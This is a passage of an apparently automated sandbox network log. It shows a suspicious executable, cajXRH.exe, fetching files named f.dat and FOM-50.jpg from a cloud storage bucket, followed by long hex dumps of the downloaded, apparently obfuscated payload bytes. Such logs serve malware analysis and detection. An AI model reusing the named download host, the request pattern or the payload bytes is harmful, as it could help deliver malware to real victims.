2025-01-12 03:11:39 UTC	4096	IN	Data Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5 Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!\|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h\|
2025-01-12 03:11:39 UTC	4096	IN	Data Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38 Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR\|u9g39Z_?\|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-Qm[Q27Gahf'h&<yw98
2025-01-12 03:11:39 UTC	4096	IN	Data Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56 Data Ascii: ;<=wJBDEVUV}hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z#i+l3y;!"#$bBoKtAqV
2025-01-12 03:11:39 UTC	4096	IN	Data Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
2025-01-12 03:11:39 UTC	4096	IN	Data Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3 Data Ascii: ctABCKw4\|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=SV.c{]=bh&g}\|6
2025-01-12 03:11:39 UTC	4096	IN	Data Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39 Data Ascii: t'FCDEhNOP}bBibcd- O\|lno=\{{\|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
2025-01-12 03:11:39 UTC	4096	IN	Data Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhijJpqrs<Syz{4s%~}kyxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
2025-01-12 03:11:39 UTC	955	IN	Data Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20 Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8Sp1l_g;#c!;3c"#%+''&k+-#//>S235-77

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49906	118.178.60.9	443	7108	C:\Users\user\Documents\cajXRH.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:42 UTC	110	OUT	GET /f.dat HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:42 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:42 GMT Content-Type: application/octet-stream Content-Length: 879 Connection: close x-oss-request-id: 678332EE384922383028CBD3 Accept-Ranges: bytes ETag: "E54C4296F011EC91D935AA353C936E34" Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 11142793972884948456 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5UxClvAR7JHZNao1PJNuNA== x-oss-server-time: 3
2025-01-12 03:11:42 UTC	879	IN	Data Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49917	118.178.60.9	443	7108	C:\Users\user\Documents\cajXRH.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:44 UTC	115	OUT	GET /FOM-50.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:44 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:44 GMT Content-Type: image/jpeg Content-Length: 55085 Connection: close x-oss-request-id: 678332F0FE87B73335ABE0E8 Accept-Ranges: bytes ETag: "DC44AE348E6A74B3A74871020FDFAC74" Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12339968747348072397 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 3ESuNI5qdLOnSHECD9+sdA== x-oss-server-time: 8
2025-01-12 03:11:44 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-12 03:11:44 UTC	4096	IN	Data Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96 Data Ascii: \|{Atwutse>4HYAVVSRt2Q\|(M8B&0:*)TW"TDn2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
2025-01-12 03:11:44 UTC	4096	IN	Data Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81 Data Ascii: FG2<L\"h((JIr0SCF4=8;987@3A>s](Sn&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
2025-01-12 03:11:44 UTC	4096	IN	Data Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4 Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn{75\|?flLOIVw)`]b hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
2025-01-12 03:11:44 UTC	4096	IN	Data Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1 Data Ascii: xryQGT_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALri.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{\|}{
2025-01-12 03:11:44 UTC	4096	IN	Data Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47 Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6:9FQ4( "pI$et)3q}Y/IZ!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
2025-01-12 03:11:44 UTC	4096	IN	Data Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a Data Ascii: yv#{wofKlY%'\JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u`vRP;\Xf b$m-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
2025-01-12 03:11:44 UTC	4096	IN	Data Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5 Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
2025-01-12 03:11:44 UTC	4096	IN	Data Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81 Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-C.G!"#$g()+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{\|
2025-01-12 03:11:44 UTC	4096	IN	Data Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 